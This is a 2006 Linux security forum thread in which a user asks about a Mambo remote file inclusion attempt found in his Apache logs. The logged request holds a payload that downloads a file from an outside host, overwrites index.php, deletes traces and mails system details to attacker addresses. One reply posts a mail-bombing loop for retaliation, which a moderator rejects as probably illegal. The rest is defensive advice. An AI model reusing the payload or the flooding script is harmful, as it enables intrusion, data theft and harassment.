LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 07-18-2006, 08:33 PM   #1
ajk48n
Member
 
Registered: Jun 2005
Posts: 34

Rep: Reputation: 15
php and apache hack


So I have a computer running apache, mysql, and php. I've noticed in my apache logs that some has been trying to get information form my system.

Over the past few days, this command has been issued.

211.213.178.106 - - [15/Jul/2006:12:22:08 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLO
BALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://220.194.57.112/~photo/cm;m
v%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_67.175.201.98%20kkparole@yahoo.com;uname%20-a%20|%2
0mail%20-s%20uname_i2_67.175.201.98%20michaelroul@yahoo.com;echo| HTTP/1.1" 404 65


Correct me if I'm wrong, but I believe they are trying to copy a file "cm" to my computer, overwrite index.php, and remove any evidence. Then they are emailing info about my system to a couple yahoo email addresses.

This command is repeated for a bunch of sub-directories all looking for index.php.

None of the subdirectories they looked for exist, and there is no index.php in the main directory, so I do't think any files were overwritten.

There is nothing important on this computer, so if I have been compromised, re-installing is not a problem, but I would rather learn from this and tighten security, and try to track down anything else that may have happened.

So I have a few questions. Some of these might be very simple.

How can I disable mail so they could not email themselves?

Was something actually executed on my computer?

Any links for how php can be exploited to let a command be executed on a remote computer?

What settings should I change for php, mysql, or apache to help stop these explots?

Last edited by ajk48n; 07-18-2006 at 08:34 PM.
 
Old 07-18-2006, 09:47 PM   #2
Matir
Moderator
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Ubuntu
Posts: 8,507

Rep: Reputation: 118Reputation: 118
The 404 indicates that the vulnerable application (mambo) is not installed on your system. Interestingly, you can get the hackers email addresses (two yahoo accounts) from the data they sent you. I doubt you'd be able to get anything done, however.
 
Old 07-19-2006, 02:29 AM   #3
TigerOC
Senior Member
 
Registered: Jan 2003
Location: Devon, UK
Distribution: Debian Etc/kernel 2.6.18-4K7
Posts: 2,380

Rep: Reputation: 49
The gentleman (caca) is well lnown to me. My suggestion is to look at implementing mod-security and the common rules on your apache server if you are using php based apps. There are also modifications that should be made to php.ini such as turning globals off. You can view the code for the exploit by using the address before the "&cmd". He isn't trying to upload the app to your system. The code from this page is probing your system to find weaknesses in your system security.
Whilst there may not be anything important on your server you might find that your system is "acquired" by a hacker and applications such as IRC software is installed and a group then starts using your system as a meeting place. The most important thing is ensure that he doesn't get access to /.

Last edited by TigerOC; 07-19-2006 at 02:34 AM.
 
Old 07-19-2006, 04:05 AM   #4
nx5000
Senior Member
 
Registered: Sep 2005
Location: Out
Posts: 3,307

Rep: Reputation: 52
Send him a little gift?

Code:
for (( i=1 ; $i<1000 ; i=$(($i+1)) )) ; do head -c8000 /dev/urandom| od -An -tu4 | mail -s uname_i2_$(($i*$i%256)).$(($i*$i*$i%255)).$(($i*$i*$i%254)).$(($i*$i*$i*$i*$i%253)) kkparole@yahoo.com ; done
 
Old 07-19-2006, 04:09 AM   #5
billymayday
Guru
 
Registered: Mar 2006
Location: Sydney, Australia
Distribution: Fedora, CentOS, OpenSuse, Slack, Gentoo, Debian, Arch, PCBSD
Posts: 6,678

Rep: Reputation: 122Reputation: 122
What does that do nx?
 
Old 07-19-2006, 04:21 AM   #6
nx5000
Senior Member
 
Registered: Sep 2005
Location: Out
Posts: 3,307

Rep: Reputation: 52
It sends him 8000 emails in a few minutes
Fightback sometimes is good. Be sure to hide your IP when you do this..

Sorry mods if this is against the rules, delete it. Well its just a for loop after all
 
Old 07-19-2006, 08:27 AM   #7
ajk48n
Member
 
Registered: Jun 2005
Posts: 34

Original Poster
Rep: Reputation: 15
How would someone be able to gain access to / since apache's root directory is /var/www ?

How do you hide your IP?

Thanks for all the help.
 
Old 07-19-2006, 11:13 AM   #8
Matir
Moderator
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Ubuntu
Posts: 8,507

Rep: Reputation: 118Reputation: 118
Unless apache's running in a chroot, the root directory for the server has no affect on controlling access to other directories.

Also, retaliation is unhelpful and probably illegal. Let's not sink to their level.
 
Old 07-19-2006, 11:19 AM   #9
TigerOC
Senior Member
 
Registered: Jan 2003
Location: Devon, UK
Distribution: Debian Etc/kernel 2.6.18-4K7
Posts: 2,380

Rep: Reputation: 49
Quote:
Originally Posted by ajk48n
How would someone be able to gain access to / since apache's root directory is /var/www ?
There are certain scripts around such as r57 which will enable the hacker to explore your whole file system if you have any vulnerable php applications on your site. I have personal experience of this. It is then possible for them, using the same tool, to upload files to your server under the ownership of your apache user (www-data or nobody). Take a look at two screen captures of this tool in action before I implemented mod-security on my server, with a vulnerable app,
here and here.
 
Old 07-19-2006, 07:03 PM   #10
ajk48n
Member
 
Registered: Jun 2005
Posts: 34

Original Poster
Rep: Reputation: 15
Thanks for all the replies.

What changes could I add in apache's security files that would make these or other attacks have less chances of succeeding?
 
Old 07-19-2006, 07:12 PM   #11
Matir
Moderator
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Ubuntu
Posts: 8,507

Rep: Reputation: 118Reputation: 118
Really, if you're running a vulnerable application, apache won't stop it. However, there is a decent article on securing apache in general at http://www.securityfocus.com/infocus/1694. A similar article for PHP, by the same author, is can be found at http://www.securityfocus.com/infocus/1706.
 
Old 07-19-2006, 10:29 PM   #12
ajk48n
Member
 
Registered: Jun 2005
Posts: 34

Original Poster
Rep: Reputation: 15
Thanks for the links
 
Old 07-19-2006, 11:23 PM   #13
Matir
Moderator
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Ubuntu
Posts: 8,507

Rep: Reputation: 118Reputation: 118
No problem. Let me know if I can expand on any of the content in those articles.
 
Old 07-20-2006, 10:17 AM   #14
fedora4002
Member
 
Registered: Mar 2004
Posts: 135

Rep: Reputation: 15
Look like someone trying to fine vulnerable mambo system
http://seclists.org/lists/fulldisclo.../Mar/0176.html
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
I really need help. Looks like everybody is trying to hack my apache server stormrider_may Linux - Security 2 02-23-2006 06:32 PM
Searching For Someone who can hack Admin panel on PHP! :) skate Linux - Software 3 12-29-2004 09:26 AM
Apache logs - Hack attempt or not? lawadm1 Linux - Software 6 11-05-2004 11:53 PM
Apache source code hack - Server response headers 2.0.49 fireman949 Linux - Software 2 05-24-2004 10:31 AM
Apache hack? patpawlowski Linux - Security 6 02-09-2004 01:30 PM


All times are GMT -5. The time now is 06:55 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration